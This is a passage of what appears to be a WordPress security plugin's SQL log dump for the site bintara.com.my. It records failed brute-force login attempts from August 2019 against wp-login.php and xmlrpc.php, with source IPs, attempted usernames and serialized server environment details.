Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.9.159.44\";s:11:\"REMOTE_PORT\";s:5:\"37806\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUHiw0@TGWC-1tzGX6IHwAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566902155.6418\";s:12:\"REQUEST_TIME\";s:10:\"1566902155\";}}','notice','2019-08-27 10:35:56','2019-08-27 10:35:56',17684608,19175264,'https://bintara.com.my/wp-login.php',1,0,'103.9.159.44'),(23421,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.9.159.44\";s:11:\"REMOTE_PORT\";s:5:\"38058\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUHjYtV65@1l3w0lHOBHgAAAFQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566902157.8977\";s:12:\"REQUEST_TIME\";s:10:\"1566902157\";}}','notice','2019-08-27 10:35:59','2019-08-27 10:35:58',18202136,19498592,'https://bintara.com.my/xmlrpc.php',1,0,'103.9.159.44'),(23422,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.154.180.182\";s:11:\"REMOTE_PORT\";s:5:\"41400\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUJpbdCvC5@KvzqwiFW8AAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566902693.1631\";s:12:\"REQUEST_TIME\";s:10:\"1566902693\";}}','notice','2019-08-27 10:44:54','2019-08-27 10:44:53',17683128,19174104,'https://bintara.com.my/wp-login.php',1,0,'35.154.180.182'),(23423,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"52.35.6.62\";s:11:\"REMOTE_PORT\";s:5:\"53264\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWULqItV65@1l3w0lHODkwAAAFE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566903208.2545\";s:12:\"REQUEST_TIME\";s:10:\"1566903208\";}}','notice','2019-08-27 10:53:29','2019-08-27 10:53:28',17683848,19175072,'https://bintara.com.my/wp-login.php',1,0,'52.35.6.62'),(23424,0,'brute_force','invalid-login::username-test1','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"test1\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"52.35.6.62\";s:11:\"REMOTE_PORT\";s:5:\"53764\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWULqw0@TGWC-1tzGX6IjwAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566903211.2001\";s:12:\"REQUEST_TIME\";s:10:\"1566903211\";}}','notice','2019-08-27 10:53:32','2019-08-27 10:53:31',18200984,19499464,'https://bintara.com.my/xmlrpc.php',1,0,'52.35.6.62'),(23425,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.222.55\";s:11:\"REMOTE_PORT\";s:5:\"39228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUNiItV65@1l3w0lHOESAAAAFQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566903688.1463\";s:12:\"REQUEST_TIME\";s:10:\"1566903688\";}}','notice','2019-08-27 11:01:29','2019-08-27 11:01:28',17685432,19176320,'https://bintara.com.my/wp-login.php',1,0,'159.65.222.55'),(23426,0,'brute_force','invalid-login::username-tester','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:6:\"tester\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"474\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.222.55\";s:11:\"REMOTE_PORT\";s:5:\"39752\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUNi4tV65@1l3w0lHOESgAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566903691.3429\";s:12:\"REQUEST_TIME\";s:10:\"1566903691\";}}','notice','2019-08-27 11:01:33','2019-08-27 11:01:31',18201736,19500256,'https://bintara.com.my/xmlrpc.php',1,0,'159.65.222.55'),(23427,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.159.24\";s:11:\"REMOTE_PORT\";s:5:\"49284\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUP5Q0@TGWC-1tzGX6JBgAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566904293.8885\";s:12:\"REQUEST_TIME\";s:10:\"1566904293\";}}','notice','2019-08-27 11:11:35','2019-08-27 11:11:34',17683008,19173464,'https://bintara.com.my/wp-login.php',1,0,'37.187.159.24'),(23428,0,'brute_force','invalid-login::username-indoxploit','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:10:\"indoxploit\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"478\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.159.24\";s:11:\"REMOTE_PORT\";s:5:\"50008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUP6bdCvC5@KvzqwiFXugAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566904298.6035\";s:12:\"REQUEST_TIME\";s:10:\"1566904298\";}}','notice','2019-08-27 11:11:39','2019-08-27 11:11:38',18199768,19499344,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.159.24'),(23385,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 